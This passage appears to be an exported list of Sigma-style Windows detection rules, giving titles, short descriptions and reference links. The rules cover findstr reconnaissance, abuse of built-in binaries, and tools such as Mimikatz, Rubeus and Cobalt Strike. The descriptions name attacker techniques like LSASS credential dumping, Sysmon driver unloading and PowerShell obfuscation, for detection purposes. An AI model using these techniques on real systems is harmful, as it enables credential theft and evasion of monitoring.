Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack |
https://www.bleepingcomputer.com/news/security/hhsgov-open-redirect-used-by-coronavirus-phishing-to-spread-malware/ |
LSASS Process Reconnaissance Via Findstr.EXE |
Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID |
https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1 |
Recon Command Output Piped To Findstr.EXE |
Detects the execution of a potential recon command where the results are piped to "findstr". This is meant to trigger on inline calls of "cmd.exe" via the "/c" or "/k" for example.
Attackers often time use this technique to extract specific information they require in their reconnaissance phase.
|
https://github.com/redcanaryco/atomic-red-team/blob/02cb591f75064ffe1e0df9ac3ed5972a2e491c97/atomics/T1057/T1057.md#atomic-test-6---discover-specific-process---tasklist, https://www.hhs.gov/sites/default/files/manage-engine-vulnerability-sector-alert-tlpclear.pdf, https://www.trendmicro.com/en_us/research/22/d/spring4shell-exploited-to-deploy-cryptocurrency-miners.html |
Permission Misconfiguration Reconnaissance Via Findstr.EXE |
Detects usage of findstr with the "EVERYONE" or "BUILTIN" keywords.
This was seen being used in combination with "icacls" and other utilities to spot misconfigured files or folders permissions.
|
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ |
Security Tools Keyword Lookup Via Findstr.EXE |
Detects execution of "findstr" to search for common names of security tools. Attackers often pipe the results of recon commands such as "tasklist" or "whoami" to "findstr" in order to filter out the results.
This detection focuses on the keywords that the attacker might use as a filter.
|
https://github.com/redcanaryco/atomic-red-team/blob/987e3ca988ae3cff4b9f6e388c139c05bf44bbb8/atomics/T1518.001/T1518.001.md#atomic-test-1---security-software-discovery, https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/, https://www.hhs.gov/sites/default/files/manage-engine-vulnerability-sector-alert-tlpclear.pdf |
Insensitive Subfolder Search Via Findstr.EXE |
Detects execution of findstr with the "s" and "i" flags for a "subfolder" and "insensitive" search respectively. Attackers sometimes leverage this built-in utility to search the system for interesting files or filter through results of commands.
|
https://lolbas-project.github.io/lolbas/Binaries/Findstr/, https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/, https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f |
Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE |
Detects usage of "findstr" with the argument "385201". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed). |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md#atomic-test-5---security-software-discovery---sysmon-service |
Finger.EXE Execution |
Detects execution of the "finger.exe" utility.
Finger.EXE or "TCPIP Finger Command" is an old utility that is still present on modern Windows installation. It Displays information about users on a specified remote computer (typically a UNIX computer) that is running the finger service or daemon.
Due to the old nature of this utility and the rareness of machines having the finger service. Any execution of "finger.exe" can be considered "suspicious" and worth investigating.
|
https://twitter.com/bigmacjpg/status/1349727699863011328?s=12, https://app.any.run/tasks/40115012-a919-4208-bfed-41e82cb3dadf/, http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt |
Filter Driver Unloaded Via Fltmc.EXE |
Detect filter driver unloading activity via fltmc.exe |
https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon, https://www.cybereason.com/blog/threat-analysis-report-lockbit-2.0-all-paths-lead-to-ransom |
Sysmon Driver Unloaded Via Fltmc.EXE |
Detects possible Sysmon filter driver unloaded via fltmc.exe |
https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon |
Forfiles.EXE Child Process Masquerading |
Detects the execution of "forfiles" from a non-default location, in order to potentially spawn a custom "cmd.exe" from the current working directory.
|
https://www.hexacorn.com/blog/2023/12/31/1-little-known-secret-of-forfiles-exe/ |
Forfiles Command Execution |
Detects the execution of "forfiles" with the "/c" flag.
While this is an expected behavior of the tool, it can be abused in order to proxy execution through it with any binary.
Can be used to bypass application whitelisting.
|
https://lolbas-project.github.io/lolbas/Binaries/Forfiles/, https://pentestlab.blog/2020/07/06/indirect-command-execution/ |
Uncommon FileSystem Load Attempt By Format.com |
Detects the execution of format.com with an uncommon filesystem selection that could indicate a defense evasion activity in which "format.com" is used to load malicious DLL files or other programs.
|
https://twitter.com/0gtweet/status/1477925112561209344, https://twitter.com/wdormann/status/1478011052130459653?s=20 |
Use of FSharp Interpreters |
Detects the execution of FSharp Interpreters "FsiAnyCpu.exe" and "FSi.exe"
Both can be used for AWL bypass and to execute F# code via scripts or inline.
|
https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/design/applications-that-can-bypass-wdac, https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/, https://lolbas-project.github.io/lolbas/OtherMSBinaries/FsiAnyCpu/, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/ |
Fsutil Drive Enumeration |
Attackers may leverage fsutil to enumerated connected drives. |
Turla has used fsutil fsinfo drives to list connected drives., https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/discovery_peripheral_device.toml |
Fsutil Behavior Set SymlinkEvaluation |
A symbolic link is a type of file that contains a reference to another file.
This is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt
|
https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware, https://learn.microsoft.com/fr-fr/windows-server/administration/windows-commands/fsutil-behavior |
Fsutil Suspicious Invocation |
Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).
Might be used by ransomwares during the attack (seen by NotPetya and others).
|
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070/T1070.md, https://eqllib.readthedocs.io/en/latest/analytics/c91f422a-5214-4b17-8664-c5fcf115c0a2.html, https://github.com/albertzsigovits/malware-notes/blob/558898932c1579ff589290092a2c8febefc3a4c9/Ransomware/Lockbit.md, https://blog.cluster25.duskrise.com/2023/05/22/back-in-black-blackbyte-nt |
Potential Arbitrary Command Execution Via FTP.EXE |
Detects execution of "ftp.exe" script with the "-s" or "/s" flag and any child processes ran by "ftp.exe". |
https://lolbas-project.github.io/lolbas/Binaries/Ftp/ |
Arbitrary File Download Via GfxDownloadWrapper.EXE |
Detects execution of GfxDownloadWrapper.exe with a URL as an argument to download file. |
https://lolbas-project.github.io/lolbas/HonorableMentions/GfxDownloadWrapper/ |
Suspicious Git Clone |
Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious |
https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt |
Potentially Suspicious GoogleUpdate Child Process |
Detects potentially suspicious child processes of "GoogleUpdate.exe" |
https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf |
File Decryption Using Gpg4win |
Detects usage of Gpg4win to decrypt files |
https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html, https://www.gpg4win.de/documentation.html, https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/ |
File Encryption Using Gpg4win |
Detects usage of Gpg4win to encrypt files |
https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html, https://www.gpg4win.de/documentation.html, https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/ |
Portable Gpg.EXE Execution |
Detects the execution of "gpg.exe" from uncommon location. Often used by ransomware and loaders to decrypt/encrypt data. |
https://www.trendmicro.com/vinfo/vn/threat-encyclopedia/malware/ransom.bat.zarlock.a, https://securelist.com/locked-out/68960/, https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md |
File Encryption/Decryption Via Gpg4win From Suspicious Locations |
Detects usage of Gpg4win to encrypt/decrypt files located in potentially suspicious locations. |
https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html, https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/ |
Arbitrary Binary Execution Using GUP Utility |
Detects execution of the Notepad++ updater (gup) to launch other commands or executables |
https://twitter.com/nas_bench/status/1535322445439180803 |
Gpresult Display Group Policy Information |
Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult, https://unit42.paloaltonetworks.com/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/, https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf |
File Download Using Notepad++ GUP Utility |
Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files. |
https://twitter.com/nas_bench/status/1535322182863179776 |
Suspicious GUP Usage |
Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks |
https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html |
HH.EXE Execution |
Detects the execution of "hh.exe" to open ".chm" files. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.001/T1218.001.md, https://eqllib.readthedocs.io/en/latest/analytics/b25aa548-7937-11e9-8f5c-d46d6d62a49e.html, https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37 |
Remote CHM File Download/Execution Via HH.EXE |
Detects the usage of "hh.exe" to execute/download remotely hosted ".chm" files. |
https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html, https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md, https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37 |
HTML Help HH.EXE Suspicious Child Process |
Detects a suspicious child process of a Microsoft HTML Help (HH.exe) |
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/, https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-27939090904026cc396b0b629c8e4314acd6f5dac40a676edbc87f4567b47eb7, https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/, https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37 |
Suspicious HH.EXE Execution |
Detects a suspicious execution of a Microsoft HTML Help (HH.exe) |
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/, https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-27939090904026cc396b0b629c8e4314acd6f5dac40a676edbc87f4567b47eb7, https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/, https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37 |
HackTool - ADCSPwn Execution |
Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service |
https://github.com/bats3c/ADCSPwn |
HackTool - Bloodhound/Sharphound Execution |
Detects command line parameters used by Bloodhound and Sharphound hack tools |
https://github.com/BloodHoundAD/BloodHound, https://github.com/BloodHoundAD/SharpHound |
HackTool - F-Secure C3 Load by Rundll32 |
F-Secure C3 produces DLLs with a default exported StartNodeRelay function. |
https://github.com/FSecureLABS/C3/blob/11a081fd3be2aaf2a879f6b6e9a96ecdd24966ef/Src/NodeRelayDll/NodeRelayDll.cpp#L12 |
HackTool - Certify Execution |
Detects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments. |
https://github.com/GhostPack/Certify |
HackTool - Certipy Execution |
Detects Certipy execution, a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments.
|
https://github.com/ly4k/Certipy, https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7 |
Operator Bloopers Cobalt Strike Commands |
Detects use of Cobalt Strike commands accidentally entered in the CMD shell |
https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf, https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/, https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/ |
Operator Bloopers Cobalt Strike Modules |
Detects Cobalt Strike module/commands accidentally entered in CMD shell |
https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf, https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/, https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/ |
CobaltStrike Load by Rundll32 |
Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line. |
https://www.cobaltstrike.com/help-windows-executable, https://redcanary.com/threat-detection-report/, https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/ |
Potential CobaltStrike Process Patterns |
Detects potential process patterns related to Cobalt Strike beacon activity |
https://hausec.com/2021/07/26/cobalt-strike-and-tradecraft/, https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/ |
HackTool - CoercedPotato Execution |
Detects the use of CoercedPotato, a tool for privilege escalation |
https://github.com/hackvens/CoercedPotato, https://blog.hackvens.fr/articles/CoercedPotato.html |
HackTool - Covenant PowerShell Launcher |
Detects suspicious command lines used in Covenant luanchers |
https://posts.specterops.io/covenant-v0-5-eee0507b85ba |
HackTool - CrackMapExec Execution |
This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced. |
https://mpgn.gitbook.io/crackmapexec/smb-protocol/authentication/checking-credentials-local, https://www.mandiant.com/resources/telegram-malware-iranian-espionage, https://www.infosecmatter.com/crackmapexec-module-library/?cmem=mssql-mimikatz, https://www.infosecmatter.com/crackmapexec-module-library/?cmem=smb-pe_inject |
HackTool - CrackMapExec Execution Patterns |
Detects various execution patterns of the CrackMapExec pentesting framework |
https://github.com/byt3bl33d3r/CrackMapExec |
HackTool - CrackMapExec Process Patterns |
Detects suspicious process patterns found in logs when CrackMapExec is used |
https://mpgn.gitbook.io/crackmapexec/smb-protocol/obtaining-credentials/dump-lsass |
HackTool - CrackMapExec PowerShell Obfuscation |
The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule. |
https://github.com/byt3bl33d3r/CrackMapExec, https://github.com/byt3bl33d3r/CrackMapExec/blob/0a49f75347b625e81ee6aa8c33d3970b5515ea9e/cme/helpers/powershell.py#L242 |
HackTool - CreateMiniDump Execution |
Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine |
https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass |
HackTool - DInjector PowerShell Cradle Execution |
Detects the use of the Dinject PowerShell cradle based on the specific flags |
https://web.archive.org/web/20211001064856/https://github.com/snovvcrash/DInjector |
HackTool - Dumpert Process Dumper Execution |
Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory |
https://github.com/outflanknl/Dumpert, https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/ |
HackTool - EDRSilencer Execution |
Detects the execution of EDRSilencer, a tool that leverages Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server based on PE metadata information.
|
https://github.com/netero1010/EDRSilencer |
HackTool - Empire PowerShell Launch Parameters |
Detects suspicious powershell command line parameters used in Empire |
https://github.com/EmpireProject/Empire/blob/c2ba61ca8d2031dad0cfc1d5770ba723e8b710db/lib/common/helpers.py#L165, https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/deaduser.py#L191, https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/resolver.py#L178, https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64 |
HackTool - Empire PowerShell UAC Bypass |
Detects some Empire PowerShell UAC bypass methods |
https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64, https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-FodHelperBypass.ps1#L64 |
Hacktool Execution - Imphash |
Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed |
Internal Research |
HackTool - WinRM Access Via Evil-WinRM |
Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-3---winrm-access-with-evil-winrm, https://github.com/Hackplayers/evil-winrm |
Hacktool Execution - PE Metadata |
Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed |
https://github.com/cube0x0, https://www.virustotal.com/gui/search/metadata%253ACube0x0/files |
HackTool - GMER Rootkit Detector and Remover Execution |
Detects the execution GMER tool based on image and hash fields. |
http://www.gmer.net/ |
HackTool - HandleKatz LSASS Dumper Execution |
Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same |
https://github.com/codewhitesec/HandleKatz |
HackTool - Hashcat Password Cracker Execution |
Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.002/T1110.002.md#atomic-test-1---password-cracking-with-hashcat, https://hashcat.net/wiki/doku.php?id=hashcat |
HackTool - Htran/NATBypass Execution |
Detects executable names or flags used by Htran or Htran-like tools (e.g. NATBypass) |
https://github.com/HiwinCN/HTran, https://github.com/cw1997/NATBypass |
HackTool - Hydra Password Bruteforce Execution |
Detects command line parameters used by Hydra password guessing hack tool |
https://github.com/vanhauser-thc/thc-hydra |
HackTool - Potential Impacket Lateral Movement Activity |
Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework |
https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/wmiexec.py, https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/atexec.py, https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/smbexec.py, https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/dcomexec.py, https://www.elastic.co/guide/en/security/current/suspicious-cmd-execution-via-wmi.html |
HackTool - Impacket Tools Execution |
Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives) |
https://github.com/ropnop/impacket_static_binaries/releases/tag/0.9.21-dev-binaries |
HackTool - Impersonate Execution |
Detects execution of the Impersonate tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively |
https://sensepost.com/blog/2022/abusing-windows-tokens-to-compromise-active-directory-without-touching-lsass/, https://github.com/sensepost/impersonate |
Invoke-Obfuscation COMPRESS OBFUSCATION |
Detects Obfuscated Powershell via COMPRESS OBFUSCATION |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation CLIP+ Launcher |
Detects Obfuscated use of Clip.exe to execute PowerShell |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Obfuscated IEX Invocation |
Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block |
https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888 |
Invoke-Obfuscation STDIN+ Launcher |
Detects Obfuscated use of stdin to execute PowerShell |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation VAR+ Launcher |
Detects Obfuscated use of Environment Variables to execute PowerShell |
https://github.com/SigmaHQ/sigma/issues/1009 |
HackTool - Inveigh Execution |
Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool |
https://github.com/Kevin-Robertson/Inveigh, https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/ |
Invoke-Obfuscation Via Stdin |
Detects Obfuscated Powershell via Stdin in Scripts |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Via Use Clip |
Detects Obfuscated Powershell via use Clip.exe in Scripts |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Via Use MSHTA |
Detects Obfuscated Powershell via use MSHTA in Scripts |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION |
Detects Obfuscated Powershell via VAR++ LAUNCHER |
https://github.com/SigmaHQ/sigma/issues/1009 |
HackTool - Jlaive In-Memory Assembly Execution |
Detects the use of Jlaive to execute assemblies in a copied PowerShell |
https://jstnk9.github.io/jstnk9/research/Jlaive-Antivirus-Evasion-Tool, https://web.archive.org/web/20220514073704/https://github.com/ch2sh/Jlaive |
HackTool - Koadic Execution |
Detects command line parameters used by Koadic hack tool |
https://unit42.paloaltonetworks.com/unit42-sofacy-groups-parallel-attacks/, https://github.com/offsecginger/koadic/blob/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/stager/js/stdlib.js, https://blog.f-secure.com/hunting-for-koadic-a-com-based-rootkit/ |
HackTool - KrbRelay Execution |
Detects the use of KrbRelay, a Kerberos relaying tool |
https://github.com/cube0x0/KrbRelay |
HackTool - KrbRelayUp Execution |
Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced |
https://github.com/Dec0ne/KrbRelayUp |
HackTool - RemoteKrbRelay Execution |
Detects the use of RemoteKrbRelay, a Kerberos relaying tool via CommandLine flags and PE metadata.
|
https://github.com/CICADA8-Research/RemoteKrbRelay |
HackTool - LaZagne Execution |
Detects the execution of the LaZagne. A utility used to retrieve multiple types of passwords stored on a local computer.
LaZagne has been leveraged multiple times by threat actors in order to dump credentials.
|
https://github.com/AlessandroZ/LaZagne/tree/master, https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/, https://cloud.google.com/blog/topics/threat-intelligence/alphv-ransomware-backup/, https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/, https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/raw/800c0e06571993a54e39571cf27fd474dcc5c0bc/2017/2017.11.14.Muddying_the_Water/muddying-the-water-targeted-attacks.pdf |
HackTool - LocalPotato Execution |
Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples |
https://www.localpotato.com/localpotato_html/LocalPotato.html, https://github.com/decoder-it/LocalPotato |
Potential Meterpreter/CobaltStrike Activity |
Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting |
https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment, https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/ |
HackTool - Mimikatz Execution |
Detection well-known mimikatz command line arguments |
https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment, https://tools.thehacker.recipes/mimikatz/modules |
HackTool - PCHunter Execution |
Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff |
https://web.archive.org/web/20231210115125/http://www.xuetr.com/, https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/, https://www.hexacorn.com/blog/2018/04/20/kernel-hacking-tool-you-might-have-never-heard-of-xuetr-pchunter/ |
HackTool - Default PowerSploit/Empire Scheduled Task Creation |
Detects the creation of a schtask via PowerSploit or Empire Default Configuration. |
https://github.com/0xdeadbeefJERKY/PowerSploit/blob/8690399ef70d2cad10213575ac67e8fa90ddf7c3/Persistence/Persistence.psm1, https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/powershell/persistence/userland/schtasks.py |
HackTool - PowerTool Execution |
Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files |
https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/, https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html, https://twitter.com/gbti_sa/status/1249653895900602375?lang=en, https://www.softpedia.com/get/Antivirus/Removal-Tools/ithurricane-PowerTool.shtml |
HackTool - Pypykatz Credentials Dumping Activity |
Detects the usage of "pypykatz" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored |
https://github.com/skelsec/pypykatz, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-2---registry-parse-with-pypykatz |
HackTool - PurpleSharp Execution |
Detects the execution of the PurpleSharp adversary simulation tool |
https://github.com/mvelazc0/PurpleSharp |
HackTool - Quarks PwDump Execution |
Detects usage of the Quarks PwDump tool via commandline arguments |
https://github.com/quarkslab/quarkspwdump, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east |
HackTool - RedMimicry Winnti Playbook Execution |
Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility |
https://redmimicry.com/posts/redmimicry-winnti/ |
Potential SMB Relay Attack Tool Execution |
Detects different hacktools used for relay attacks on Windows for privilege escalation |
https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/, https://pentestlab.blog/2017/04/13/hot-potato/, https://github.com/ohpe/juicy-potato, https://hunter2.gitbook.io/darthsidious/other/war-stories/domain-admin-in-30-minutes, https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire, https://www.localpotato.com/ |
HackTool - Rubeus Execution |
Detects the execution of the hacktool Rubeus via PE information of command line parameters |
https://blog.harmj0y.net/redteaming/from-kekeo-to-rubeus, https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html, https://github.com/GhostPack/Rubeus |
HackTool - SafetyKatz Execution |
Detects the execution of the hacktool SafetyKatz via PE information and default Image name |
https://github.com/GhostPack/SafetyKatz |
HackTool - SecurityXploded Execution |
Detects the execution of SecurityXploded Tools |
https://securityxploded.com/, https://web.archive.org/web/20200601000524/https://cyberx-labs.com/blog/gangnam-industrial-style-apt-campaign-targets-korean-industrial-companies/ |
HackTool - PPID Spoofing SelectMyParent Tool Execution |
Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent |
https://pentestlab.blog/2020/02/24/parent-pid-spoofing/, https://www.picussecurity.com/resource/blog/how-to-detect-parent-pid-ppid-spoofing-attacks, https://www.ired.team/offensive-security/defense-evasion/parent-process-id-ppid-spoofing, https://www.virustotal.com/gui/search/filename%253A*spoof*%2520filename%253A*ppid*/files |
HackTool - SharPersist Execution |
Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms |
https://www.mandiant.com/resources/blog/sharpersist-windows-persistence-toolkit, https://github.com/mandiant/SharPersist |
HackTool - SharpEvtMute Execution |
Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs |
https://github.com/bats3c/EvtMute |
HackTool - SharpLdapWhoami Execution |
Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller |
https://github.com/bugch3ck/SharpLdapWhoami |
HackTool - SharpMove Tool Execution |
Detects the execution of SharpMove, a .NET utility performing multiple tasks such as "Task Creation", "SCM" query, VBScript execution using WMI via its PE metadata and command line options.
|
https://github.com/0xthirteen/SharpMove/, https://pentestlab.blog/tag/sharpmove/ |
HackTool - SharpUp PrivEsc Tool Execution |
Detects the use of SharpUp, a tool for local privilege escalation |
https://github.com/GhostPack/SharpUp |
HackTool - SharpView Execution |
Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems |
https://github.com/tevora-threat/SharpView/, https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-4---system-discovery-using-sharpview |
HackTool - SharpWSUS/WSUSpendu Execution |
Detects the execution of SharpWSUS or WSUSpendu, utilities that allow for lateral movement through WSUS.
Windows Server Update Services (WSUS) is a critical component of Windows systems and is frequently configured in a way that allows an attacker to circumvent internal networking limitations.
|
https://labs.nettitude.com/blog/introducing-sharpwsus/, https://github.com/nettitude/SharpWSUS, https://web.archive.org/web/20210512154016/https://github.com/AlsidOfficial/WSUSpendu/blob/master/WSUSpendu.ps1 |
HackTool - SharpChisel Execution |
Detects usage of the Sharp Chisel via the commandline arguments |
